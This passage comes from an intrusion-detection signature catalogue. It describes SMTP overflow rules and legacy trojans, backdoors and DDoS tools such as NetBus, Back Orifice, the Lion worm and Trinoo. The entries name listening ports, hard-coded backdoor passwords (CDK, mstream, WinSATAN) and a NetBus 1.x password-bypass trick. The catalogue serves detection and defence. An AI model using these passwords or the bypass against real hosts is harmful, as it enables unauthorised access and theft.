Exchange servers in an Exchange environment. A buffer overflow exists in the SvrAppendReceivedChunk() function of
the xlsasink.dll library of Microsoft Exchange Server. In this function, the data received in an X-LINK2STATE
command is not sufficiently validated before being copied into a buffer. Successful exploitation of this vulnerability
could allow a remote attacker to execute arbitrary code or cause a denial of service.
Signature ID: 2996
SMTP command with command length exceeding 512 bytes detected.
Threat Level: Information
Industry ID: CVE-2000-0042 CVE-2000-0452 CVE-1999-0284 CVE-1999-0098 CVE-1999-1516 CVE-1999-0261
CVE-1999-0231 CVE-2005-0560 Nessus:
10047,10050,10435,10419,10256,10260,10284,10324,10042,10353,10136,10162,10254,10438
Signature Description: SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used to transfer e-mail messages
between computers. Most e-mail systems that send mail over the Internet use SMTP to send messages from one server
to another. This rule triggers when an SMTP command length exceeds 512 bytes. Successful exploitation of this
condition may crash the server.
Signature ID: 2997
Smtp Header Length exceeding configured maximum limit
Threat Level: Information
Signature Description: SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used to transfer e-mail messages
between computers. Most e-mail systems that send mail over the Internet use SMTP to send messages from one server
to another. This rule triggers when the header length exceeds the configured maximum limit. Successful exploitation of
this condition may crash the server.
Signature ID: 2998
Smtp Mime Header exceeding configured maximum limit
Threat Level: Information
Signature Description: SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used to transfer e-mail messages
between computers. Most e-mail systems that send mail over the Internet use SMTP to send messages from one server
to another. This rule triggers when the MIME header length exceeds the configured maximum limit. Successful
exploitation of this condition may crash the server.
Signature ID: 2999
Smtp Data has more than maximum configured number of Boundaries.
Threat Level: Information
Signature Description: SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used to transfer e-mail messages
between computers. Most e-mail systems that send mail over the Internet use SMTP to send messages from one server
to another. This rule triggers when the SMTP data exceeds the maximum configured number of MIME boundaries.
Successful exploitation of this condition may crash the server.
Signature ID: 3001
NetSphere presence detection
Threat Level: Severe
Industry ID: CVE-1999-0660 Nessus:
10005,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: Trojan horses are malicious programs that an attacker typically binds to some other
application or process, such as a greeting card or a game. When the user opens or triggers it, the malicious program
installs itself on the user's computer, silently tries to open a backdoor, and gives an attacker a way to take full control
of the user's system. This rule tries to detect the NetSphere backdoor. A cracker may use it to steal your password or
prevent you from working properly. NetSphere typically uses TCP ports 30100 to 30102.
Signature ID: 3004
PC Anywhere TCP Destination Port 5631 vulnerability detection
Threat Level: Information
Nessus: 10794
Signature Description: pcAnywhere is a pair of computer programs by Symantec that allows a user of the pcAnywhere
remote program on one computer to connect to a personal computer running the pcAnywhere host, provided both are
connected to the Internet or the same LAN and the password is known. pcAnywhere runs on several platforms,
including Microsoft Windows, Linux, Mac OS X, and Pocket PC. The pcAnywhere application is vulnerable to a
brute-force attack. Successful exploitation of this vulnerability allows an attacker to steal your password or prevent you
from working properly.
Signature ID: 3005
BackOrifice trojan attack
Threat Level: Severe
Industry ID: CVE-1999-0660 Nessus:
10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: BackOrifice is a trojan that allows an intruder to take control of a remote computer. Once
installed on a system, BO2K can transmit information about the machine over the network, "snooping" the screen and
keyboard of the machine. A cracker may use it to steal your passwords, modify your data, and prevent you from
working properly.
Signature ID: 3008
Backdoor CDK detected on TCP destination port 15858
Threat Level: Information
Industry ID: CVE-1999-0660 Nessus:
10036,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: The remote host appears to be running CDK, a backdoor that can be used to control your
system. To use it, a cracker only has to connect to this port and send the password 'ypi0ca'. It is very likely that this
host has been compromised.
Signature ID: 3024
Backdoor DeepThroat 3.1
Threat Level: Severe
Industry ID: CVE-1999-0660 Nessus:
10036,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: This backdoor allows anyone to partially take control of the remote system. A cracker may
use it to steal your password or prevent you from working properly. It works specifically on Windows 95, 98 and NT
platforms. It was released in 1998 by the Dark Light Corporation; other variants or versions include DeepThroat 1.0,
DeepThroat 2.0, DeepThroat 2.1, DeepThroat 3.0, DeepThroat 3.1, DeepThroat 3.1 Lite, Win32.DeepThroat, DTV2,
DTV3, BackDoor-J.srv, BackDoor-J.cli, and Backdoor.DeepThroat.
Signature ID: 3030
Trojan GateCrasher detected
Threat Level: Warning
Industry ID: CVE-1999-0660 Nessus:
10093,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: Backdoor GateCrasher 1.2 is a Trojan that opens a backdoor which, once installed on a system,
permits unauthorized users to remotely manage files, alter the user interface, shut down the system, etc. GateCrasher
typically runs from the server file "c:\WINDOWS\system.exe" over TCP ports 6969 and 6970. GateCrasher disguises
itself as a TCP/IP booster and allows a third party to take over the infected computer with the same rights as the user. It
has also been designed to be embedded in a Microsoft Word 97 document.
Signature ID: 3031
Presence of the backdoor GirlFriend detected
Threat Level: Warning
Industry ID: CVE-1999-0660 Nessus:
10093,10094,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: Backdoor GirlFriend is a Trojan that opens a backdoor which, once installed on a system,
permits unauthorized users to remotely extract passwords, control the user interface, spoof system messages, etc.
GirlFriend typically runs from the server file "C:\WINDOWS\Windll.exe" over TCP ports 21554 and 22554.
Signature ID: 3033
The presence of the virus Kuang2 detected
Threat Level: Severe
Industry ID: CVE-1999-0660 Nessus:
10132,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: Kuang2 the Virus is a program that infects all the executables on the system and sets up a
server that allows remote control of the computer. The client program allows files to be browsed, uploaded,
downloaded, etc. on the infected machine. The client program can also execute programs on the remote machine. Its
alias is W32/Weird-10240.
Signature ID: 3034
Backdoor Lion worm vulnerability
Threat Level: Severe
Nessus: 10646
Signature Description: The Lion worm infects the system (using a BIND exploit) and feeds it a web page. It also sends
out an email with /etc/passwd and /etc/shadow to [email protected]. It infects Linux machines running the BIND
DNS server. It is known to infect BIND versions 8.2, 8.2-P1, 8.2.1 and 8.2.2-Px; BIND 8.2.3-REL and BIND 9 are not
vulnerable. The Lion worm spreads via an application called pscan; randb then generates random class B networks,
probing TCP port 53. Ports 60008/tcp and 33567/tcp get a backdoor root shell (via inetd, see /etc/inetd.conf), and a
trojaned version of ssh is placed on 33568/tcp. Syslogd is killed, so logging on the system cannot be trusted. This
signature triggers when malicious traffic passes through port 60008/tcp.
Signature ID: 3035
Backdoor Lion worm vulnerability
Threat Level: Severe
Nessus: 10646
Signature Description: The Lion worm infects the system (using a BIND exploit) and feeds it a web page. It also sends
out an email with /etc/passwd and /etc/shadow to [email protected]. It infects Linux machines running the BIND DNS
server. It is known to infect BIND versions 8.2, 8.2-P1, 8.2.1 and 8.2.2-Px; BIND 8.2.3-REL and BIND 9 are not
vulnerable. The Lion worm spreads via an application called pscan; randb then generates random class B networks,
probing TCP port 53. Ports 60008/tcp and 33567/tcp get a backdoor root shell (via inetd, see /etc/inetd.conf), and a
trojaned version of ssh is placed on 33568/tcp. Syslogd is killed, so logging on the system cannot be trusted. This
rule hits on the attack pattern in which returned user identification numbers flow towards destination port 60008.
Signature ID: 3036
The presence of Lion worm on port 33567
Threat Level: Severe
Nessus: 10646
Signature Description: The Lion worm spawns shells on extra ports and a copy of SSH running on port 33568. It
sends an email to [email protected] with /etc/passwd and /etc/shadow as attachments. It randomly creates class B network
addresses and scans the network for vulnerable hosts. Once it exploits a host, it installs the t0rn rootkit. When the Lion
worm is installed on the system, ports 60008/tcp and 33567/tcp are bound to a root shell and the trojaned version of
SSH is bound to 33568/tcp. This rule hits when the attack pattern is found in traffic towards destination port 33567.
Signature ID: 3037
Backdoor Lion worm vulnerability
Threat Level: Warning
Nessus: 10646
Signature Description: The Lion worm infects the system (using a BIND exploit), sets up a listener on port 27374 and
feeds it a web page. It also sends out an email with /etc/passwd and /etc/shadow to [email protected]. It infects
Linux machines running the BIND DNS server. It is known to infect BIND versions 8.2, 8.2-P1, 8.2.1 and 8.2.2-Px;
BIND 8.2.3-REL and BIND 9 are not vulnerable. The Lion worm spreads via an application called pscan; randb then
generates random class B networks, probing TCP port 53. Ports 60008/tcp and 33567/tcp get a backdoor root shell (via
inetd, see /etc/inetd.conf), and a trojaned version of ssh is placed on 33568/tcp. Syslogd is killed, so logging on the
system cannot be trusted. This rule hits on the attack pattern in which returned user identification numbers flow
towards destination port 33567.
Signature ID: 3038
Backdoor Lion worm vulnerability
Threat Level: Severe
Nessus: 10646
Signature Description: The Lion worm infects the system (using a BIND exploit), sets up a listener on port 27374 and
feeds it a web page. It also sends out an email with /etc/passwd and /etc/shadow to [email protected]. It infects
Linux machines running the BIND DNS server. It is known to infect BIND versions 8.2, 8.2-P1, 8.2.1 and 8.2.2-Px;
BIND 8.2.3-REL and BIND 9 are not vulnerable. The Lion worm spreads via an application called pscan; randb then
generates random class B networks, probing TCP port 53. Ports 60008/tcp and 33567/tcp get a backdoor root shell (via
inetd, see /etc/inetd.conf), and a trojaned version of ssh is placed on 33568/tcp. Syslogd is killed, so logging on the
system cannot be trusted. This rule hits on the attack pattern towards destination port 33568, on which the Lion worm
runs its SSH server.
Signature ID: 3042
DDos Mstream Tool agent via TCP
Threat Level: Severe
Industry ID: CVE-2000-0138 Nessus: 10391,10501
Signature Description: The mstream program is a distributed denial of service tool based on the "stream.c" attack. This
tool includes a "master controller" and a "zombie." The master controller is the portion of the tool that controls all of
the zombie agents. An attacker connects to the master controller using Telnet to control the zombies. Communications
between the client, master, and zombie are not encrypted. It is much like previously known DDoS tools such as
Trinoo. The version in the wild uses TCP port 6723, and the password is "sex".
Signature ID: 3043
DDoS Mstream Tool Login
Threat Level: Severe
Industry ID: CVE-2000-0138 Nessus: 10391,10501
Signature Description: The mstream program is a distributed denial of service tool based on the "stream.c" attack. This
tool includes a "master controller" and a "zombie." The master controller is the portion of the tool that controls all of
the zombie agents. An attacker connects to the master controller using Telnet to control the zombies. Communications
between the client, master, and zombie are not encrypted. It is much like previously known DDoS tools such as
Trinoo. It works on TCP port 15104.
Signature ID: 3044
Backdoor NetBus
Threat Level: Warning
Industry ID: CVE-1999-0660 Nessus:
10151,10024,10152,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: This rule tries to detect the NetBus backdoor. NetBus allows anyone to partially take control of
the remote system. A cracker may use it to steal your password or prevent you from working properly. This backdoor
typically runs over TCP ports 12345 and 12346.
Signature ID: 3045
Backdoor NetBus 1.x Traffic on Port 20034
Threat Level: Warning
Industry ID: CVE-1999-0660 Nessus:
10151,10024,10152,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: NetBus and NetBus Pro are two of many backdoor programs. A NetBus 1.x server can be
connected to without a password: open two clients that are compatible with the server being connected to, connect with
one client and wait until the password screen appears, then connect to the same server with the other client and it will
not ask for a password. This works because the server thinks you are already connected and sees the same IP connected
to the same server, so it allows the connection. This rule tries to detect Backdoor NetBus 1.x. It allows anyone to
partially take control of the remote system. A cracker may use it to steal your password or prevent you from working
properly. It typically runs over TCP port 20034.
Signature ID: 3047
NetBus 1.x getInfo request
Threat Level: Critical
Industry ID: CVE-1999-0660 Nessus:
10151,10024,10152,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: NetBus and NetBus Pro are two of many backdoor programs. A NetBus 1.x server can be
connected to without a password: open two clients that are compatible with the server being connected to, connect with
one client and wait until the password screen appears, then connect to the same server with the other client and it will
not ask for a password. This works because the server thinks you are already connected and sees the same IP connected
to the same server, so it allows the connection. This rule tries to detect Backdoor NetBus 1.x. It allows anyone to
partially take control of the remote system. A cracker may use it to steal your password or prevent you from working
properly. It typically runs over TCP ports 12345 and 12346.
Signature ID: 3049
Backdoor Netbus Pro Server
Threat Level: Severe
Industry ID: CVE-1999-0660 Nessus:
10152,10024,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: This rule tries to detect Backdoor NetBus Pro. NetBus Pro is a Trojan (in reality, an
administrative tool) that opens a backdoor which, once installed on a system, permits unauthorized users to remotely
perform a variety of operations, such as changing the registry, executing commands, starting services, listing files, and
uploading or downloading files. NetBus Pro typically runs over TCP port 20034.
Signature ID: 3050
Request to Netbus Pro Server
Threat Level: Warning
Industry ID: CVE-1999-0660 Nessus:
10152,10024,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: NetBus is a remote administration tool that can be used for malicious purposes (for example as a
backdoor), such as sniffing what the user is typing, their passwords, and so on. A cracker may have installed it to
control hosts on your network.
Signature ID: 3052
Backdoor Portal of Doom Server
Threat Level: Warning
Industry ID: CVE-1999-0660 Nessus:
10186,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: Portal of Doom is a backdoor which allows anyone to partially take control of the remote
system. Once infected with this backdoor, the system runs the server executable "ljsgz.exe" to take commands from the
attacker. When this program executes, it performs a specific set of actions, which usually work toward allowing the
trojan to survive on a system and open up a backdoor. Another symptom of this Trojan is that it sends a message every
two seconds reading "Keep Aliveeeeeeee". This signature triggers when the attack pattern arrives in the incoming
request traffic.
Signature ID: 3053
Backdoor Portal of Doom Server(Reply)
Threat Level: Severe
Industry ID: CVE-2000-0138 CVE-1999-0660 Nessus:
10350,10024,10152,10151,10409,10053,10270,10501,10288,10307,10920,10921,10501
Signature Description: Portal of Doom is a backdoor which allows anyone to partially take control of the remote
system. Once infected with this backdoor, the system runs the server executable "ljsgz.exe" to take commands from the
attacker. When this program executes, it performs a specific set of actions, which usually work toward allowing the
trojan to survive on a system and open up a backdoor. Another symptom of this Trojan is that it sends a message every
two seconds reading "Keep Aliveeeeeeee". This signature triggers when the attack pattern arrives in the outbound
response traffic.
Signature ID: 3054
Shaft DDoS Traffic from handler to agent
Threat Level: Information
Industry ID: CVE-2000-0138 CVE-1999-0660 Nessus:
10350,10024,10152,10151,10409,10053,10270,10501,10288,10307,10920,10921,10501
Signature Description: Shaft is a DDoS tool consisting of handlers, clients and agents. Agents are programs that are
planted in compromised systems. The attacker controls them remotely via a simple telnet connection (client) to the
handler (20432/tcp). Handlers act as masters that order agents to launch a DoS. Shaft agents are capable of UDP, TCP
SYN, or ICMP packet flooding, or a combination of all three, based on the commands from the handlers. Communication
between handlers and agents is achieved using the unreliable IP protocol UDP (18753/udp). This rule triggers when a
Shaft handler sends an "are you alive" command query to the agent.
Signature ID: 3055
SyGate un-authenticated remote administration vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0113 Bugtraq: 952 Nessus: 10274
Signature Description: Sybergen SyGate is a proxy for sharing an internet connection that uses Network Address
Translation (NAT) and virtual interfaces to share an internet connection among multiple PCs. Sybergen SyGate 2.0 to
3.11 (inclusive) includes an undocumented feature called the Remote Administration Engine (RAE). This feature opens
port 7323 and provides a user interface to any incoming telnet session. This interface requires no authentication of any
kind, and includes the ability to stop the SyGate service, display various statistics on the SyGate process, and display
all TCP or UDP connections, allowing an attacker to generate a map of the internal network.
Signature ID: 3057
Trojan Trinity v3 Server Response
Threat Level: Severe
Industry ID: CVE-2000-0138 Nessus: 10501
Signature Description: A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood
the bandwidth or resources of a targeted system, usually one or more web servers. Trinity is a distributed denial of
service Trojan agent for Linux that is controlled by IRC (Internet Relay Chat) to make your system attack another
network. The Trinity agent connects to an Undernet IRC server and waits for commands to be sent to the channel. The
Trinity trojan can perform 8 different types of flood attacks: UDP flood, Fragment flood, SYN flood, RST flood,
random flags flood, ACK flood, establish flood, and null flood.
Signature ID: 3059
Response from Backdoor/trojan Trin00 server
Threat Level: Severe
Industry ID: CVE-2000-0138 CVE-1999-0660 Nessus:
10288,10024,10152,10151,10409,10053,10270,10501,10307,10350,10920,10921,10501
Signature Description: Trinoo daemons were originally found in binary form on a number of Solaris 2.x systems,
which were identified as having been compromised by exploitation of buffer overrun bugs in the RPC services "statd",
"cmsd" and "ttdbserverd". It is a UDP-based, access-restricted remote command shell, used in conjunction with
sniffers to automate recovering sniffer logs. This signature detects Trin00 server responses.
Signature ID: 3061
VNC over HTTP or Backdoor Y3K RAT 1.6 Detected
Threat Level: Warning
Nessus: 10758
Signature Description: This signature detects traffic on ports that are known to be used by the VNC service or the Y3K
RAT trojan. Virtual Network Computing (VNC) is a graphical desktop sharing system which uses the RFB protocol to
remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying
the graphical screen updates back in the other direction, over a network. Y3K RAT is one of many backdoor programs
that attackers can use to access your computer system without your knowledge or consent. With the Y3K RAT
backdoor, an attacker can shut down the computer, log keystrokes, and access files on the computer. Traffic on these
ports must be monitored.
Signature ID: 3062
VNC Through HTTP Traffic Detected
Threat Level: Warning
Nessus: 10758
Signature Description: VNC (Virtual Network Computing) software makes it possible to view and fully interact with
one computer from any other computer or mobile device anywhere on the Internet. VNC software is cross-platform,
allowing remote control between different types of computer. For ultimate simplicity, there is even a Java viewer, so
that any desktop can be controlled remotely from within a browser without having to install software. Using this, VNC
permits a console to be displayed remotely.
Signature ID: 3063
VNC HTTP Traffic with vncviewer.class Detected
Threat Level: Warning
Nessus: 10758
Signature Description: VNC (Virtual Network Computing) software makes it possible to view and fully interact with
one computer from any other computer or mobile device anywhere on the Internet. VNC software is cross-platform,
allowing remote control between different types of computer. For ultimate simplicity, there is even a Java viewer, so
that any desktop can be controlled remotely from within a browser without having to install software. Using this, VNC
permits a console to be displayed remotely. This signature detects access to the vncviewer class.
Signature ID: 3065
Request to Trin00 for Windows server
Threat Level: Severe
Industry ID: CVE-2000-0138 CVE-1999-0660 Nessus:
10307,10024,10152,10151,10409,10053,10270,10501,10288,10350,10920,10921,10501
Signature Description: Trinoo daemons were originally found in binary form on a number of Solaris 2.x systems,
which were identified as having been compromised by exploitation of buffer overrun bugs in the RPC services "statd",
"cmsd" and "ttdbserverd". It is a UDP-based, access-restricted remote command shell, used in conjunction with
sniffers to automate recovering sniffer logs. This signature detects Trin00 server requests.
Signature ID: 3066
Backdoor WinSATAN server Login using "uyhw6377w"
Threat Level: Warning
Nessus: 10316
Signature Description: The WinSATAN trojan claims to be a security application called WinSATAN. However, none
of the software's three functions works properly. The Trojan is written in Delphi and has a hard-coded list of IRC
servers. The Trojan runs on start-up and tries to connect to the IRC servers every few seconds until successful. The
connection remains even when the program is closed, and this activity cannot be detected using Task Manager or by
looking at the applications on the task bar. This trojan affects only Windows 3.x and Windows 9X. This signature
detects use of a hard-coded user name in the trojan.
Signature ID: 3067
Backdoor WinSATAN server Login
Threat Level: Warning
Nessus: 10316
Signature Description: The WinSATAN trojan claims to be a security application called WinSATAN. However, none
of the software's three functions works properly. The Trojan is written in Delphi and has a hard-coded list of IRC
servers. The Trojan runs on start-up and tries to connect to the IRC servers every few seconds until successful. The
connection remains even when the program is closed, and this activity cannot be detected using Task Manager or by
looking at the applications on the task bar. This trojan affects only Windows 3.x and Windows 9X. This signature
detects use of a hard-coded password in the trojan.
Signature ID: 3068
PC Anywhere TCP
Threat Level: Information
Nessus: 10794
Signature Description: pcAnywhere is a pair of computer programs by Symantec which allows a user of the
pcAnywhere remote program on a computer to connect to a personal computer running the pcAnywhere host if both are
connected to the internet or the same LAN and the password is known. pcAnywhere runs on several platforms,
including Microsoft Windows, Linux, Mac OS X, and Pocket PC. This service could be targeted by an attacker to
partially take control of the remote system. An attacker can obtain the credentials necessary to log in through a
brute force attack or by other means. The attacker may then use it to steal your mail password, etc., or prevent you from
working properly.
Signature ID: 3088
Backdoor AOL Admin for Windows
Threat Level: Warning
Industry ID: CVE-1999-0660
Signature Description: The AOL Admin backdoor is one of many backdoor programs that attackers can use to access
your Windows 9x and NT computer system without your knowledge or consent. With the AOL Admin backdoor, an
attacker can execute programs, delete files, send Instant Messages to an AOL user, monitor Instant Messages that you
receive and send email from your AOL account.
Signature ID: 3091
Backdoor Backdoor2.03 for Windows
Threat Level: Severe
Signature Description: Backdoor Backdoor2.03 is a poorly written trojan horse for Windows 9x/NT. This trojan horse
allows a number of remote operations to be performed on the infected hosts and poses a significant threat. By default
this backdoor runs on port 1999.
Signature ID: 3092
Biggluck Backdoor for Windows
Threat Level: Warning
Signature Description: The Biggluck backdoor infects Windows 9x, NT, XP, 2000, 2003 systems and allows attackers
to retrieve Dial-Up Networking accounts and their passwords via a remote telnet connection to the system.
Signature ID: 3093
Blazer 5 Backdoor for Windows
Threat Level: Warning
Industry ID: CVE-2001-0876 Bugtraq: 3723 Nessus: 11765
Signature Description: 'Blazer5', which is also known as 'Trojan Sockets.cli' or 'Backdoor.Kamikaze', is a Trojan that
once installed on a system, permits unauthorized users to remotely perform a variety of operations, such as changing
the registry, executing commands, starting services, listing files, and uploading or downloading files. Blazer5 operates
from the server file "C:\WINDOWS\SYSTEM\MSchv32.exe" over port 5000 via TCP. This backdoor operates on
Microsoft Windows 9X, NT, XP, 2000, 2003 server operating systems.
Signature ID: 3094
Back Orifice 2000 Backdoor detection
Threat Level: Severe
Signature Description: Back Orifice 2000, or 'BO2k', is a computer program designed for remote system administration.
It enables a user to control a computer running the Microsoft Windows operating system from a remote location. Back
Orifice 2000 is widely regarded as a backdoor program. This classification is justified by the fact that Back Orifice
2000 is often installed via a Trojan horse by a malicious user without the knowledge of the system administrator.
System administrators are expected to ignore this alert when they are using Back Orifice 2000 for administration of
their system. This signature detects Back Orifice 2000 traffic on TCP Ports 54320-54321.
Signature ID: 3095
Back Orifice 2000 Backdoor detection
Threat Level: Severe
Signature Description: Back Orifice 2000, or 'BO2k', is a computer program designed for remote system administration.
It enables a user to control a computer running the Microsoft Windows operating system from a remote location. Back
Orifice 2000 is widely regarded as a backdoor program. This classification is justified by the fact that Back Orifice
2000 is often installed via a Trojan horse by a malicious user without the knowledge of the system administrator.
System administrators are expected to ignore this alert when they are using Back Orifice 2000 for administration of
their system. This signature detects Back Orifice 2000 traffic on TCP Port 31337.
Signature ID: 3096
Back Orifice 2000 Backdoor detection
Threat Level: Severe
Signature Description: Back Orifice 2000, or 'BO2k', is a computer program designed for remote system administration.
It enables a user to control a computer running the Microsoft Windows operating system from a remote location. Back
Orifice 2000 is widely regarded as a backdoor program. This classification is justified by the fact that Back Orifice
2000 is often installed via a Trojan horse by a malicious user without the knowledge of the system administrator.
System administrators are expected to ignore this alert when they are using Back Orifice 2000 for administration of
their system. This signature detects Back Orifice 2000 traffic on TCP Port 1025.
Signature ID: 3097
Bugs Backdoor for Windows 9x and NT
Threat Level: Severe
Signature Description: Backdoor 'Bugs', also known as 'W32/Backdoor.Feap', 'Backdoor.Feap' and 'Backdoor-BI', is a
backdoor program that permits unauthorized malicious users to remotely perform a variety of operations on the host
system without the administrator's knowledge. These operations include changing the desktop appearance, changing the
registry, executing commands, adding or removing start-up programs, starting services, listing, uploading or downloading
files, and retrieving shared information from programs using Dynamic Data Exchange. Bugs runs from the server file
"C:\WINDOWS\SYSTEM\SYSTEMTR.EXE" over port 2115 via TCP and affects Microsoft Windows 9x/NT.
Signature ID: 3098
Backdoor Coma detection
Threat Level: Warning
Signature Description: Coma is a backdoor for Windows 9x that allows a remote attacker to take control of a system
once it has been infected. Control includes allowing the attacker to retrieve system information, execute programs, use
FTP to transfer files, and log keystrokes. This backdoor is known to infect only windows 9x based systems.
Signature ID: 3099
Cow Backdoor for Windows 9x detection
Threat Level: Warning
Signature Description: 'Trojan Cow' 1.0, also known as 'Backdoor.Cow' or 'Cow backdoor', is a Trojan that, once
installed on a system, permits unauthorized remote users to manage files, manage programs, alter the user interface,
shut down Windows, etc. Trojan Cow typically operates from the server file "C:\WINDOWS\Syswindow.exe" over port
2001 via TCP. This trojan is known to be used on Microsoft Windows 9x/ME/NT/2000/XP based systems.
Signature ID: 3100
Backdoor DeltaSource for Windows
Threat Level: Severe
Signature Description: Backdoor DeltaSource is a Trojan that opens up a backdoor program. It affects all Microsoft
Windows versions. Once installed on a system, it permits unauthorized users to remotely ping, manipulate programs,
snoop IRC traffic, manipulate the user interface, etc. DeltaSource typically runs on port 47262 via UDP. This signature
detects UDP traffic to common DeltaSource ports.
Signature ID: 3101
Doly Backdoor for Windows detection
Threat Level: Severe
Signature Description: A backdoor is a program used for bypassing normal authentication, securing remote access to a
computer while attempting to remain undetected. Doly is a backdoor for Windows 9x and NT systems that allows
remote attackers to connect to the infected computer over the Internet and log your keystrokes, start an FTP server,
capture your screen, and shut down or reboot the infected computer.
Signature ID: 3102
Fore Backdoor For Windows 9x
Threat Level: Information
Signature Description: A backdoor is a program used for bypassing normal authentication, securing remote access to a
computer while attempting to remain undetected. Fore backdoor performs standard backdoor functions that include
execution of programs, retrieval of system information, restarting the computer, retrieval of Dial-Up Networking
accounts and passwords, creation, retrieval, and manipulation of files using a built-in FTP server, opening and closing
of CD-ROM drive. Fore typically uses TCP ports 50766 and 21.
Signature ID: 3103
Backdoor Frenzy 1.0.1/2000 detection
Threat Level: Critical
Signature Description: A backdoor is a program used for bypassing normal authentication, securing remote access to a
computer while attempting to remain undetected. The Frenzy backdoor allows a remote attacker to perform actions like
opening and closing the CD-ROM tray, making the computer beep, hiding the task bar, moving the mouse pointer, and
restarting the computer.
Signature ID: 3104
HackersParadise Backdoor detection
Threat Level: Information
Signature Description: A backdoor is a program used for bypassing normal authentication, securing remote access to a
computer while attempting to remain undetected. The Hacker's Paradise backdoor can allow a user to access files on
hard drives, manipulate the appearance of the desktop, and retrieve the RAS passwords (only on Windows NT based
systems). This backdoor is known to infect Windows 9x/NT/2000/XP/2003 based systems.
Signature ID: 3105
HVL-RAT backdoor (BF Evolution) for Windows detection
Threat Level: Warning
Signature Description: The 'HVL-RAT' backdoor, which is also known as 'B.F.Evolution', allows remote attackers to
take control of a user's America Online session. It also streams audio from the microphone on the infected system to the
attacker and allows the attacker to reboot or shut down the infected machine. Most of its features are based on AOL,
such as spying in chat rooms and reading instant messages of users on affected systems. When HVL-RAT starts, it
sends an email to [email protected] giving away the IP address, and the AOL username and password on the infected
system. This backdoor is known to infect Windows 9X/NT/2000/XP/2003 based systems.
Signature ID: 3106
Maverick's Matrix Backdoor detection
Threat Level: Severe
Signature Description: A backdoor is a program used for bypassing normal authentication, securing remote access to a
computer while attempting to remain undetected. Backdoor Maverick's Matrix 1.0 is a Trojan that permits unauthorized
users to remotely perform a variety of operations, including accessing files on the infected computer, retrieving
passwords, and starting and stopping an FTP server on the infected system. Maverick's Matrix typically runs over port
1269 via TCP and is known to infect Windows 9x based systems.
Signature ID: 3108
Netmonitor Backdoor detection
Threat Level: Warning
Signature Description: NetMonitor is a backdoor for Windows 9x/NT that allows an attacker to have remote access to
the file system, registry, and desktop of an infected system. In addition to these functions, the program also allows an
attacker to send messages to the console and shut down the infected system.
Signature ID: 3109
PhaseZero Backdoor detection
Threat Level: Warning
Signature Description: A backdoor is a program used for bypassing normal authentication, securing remote access to a
computer while attempting to remain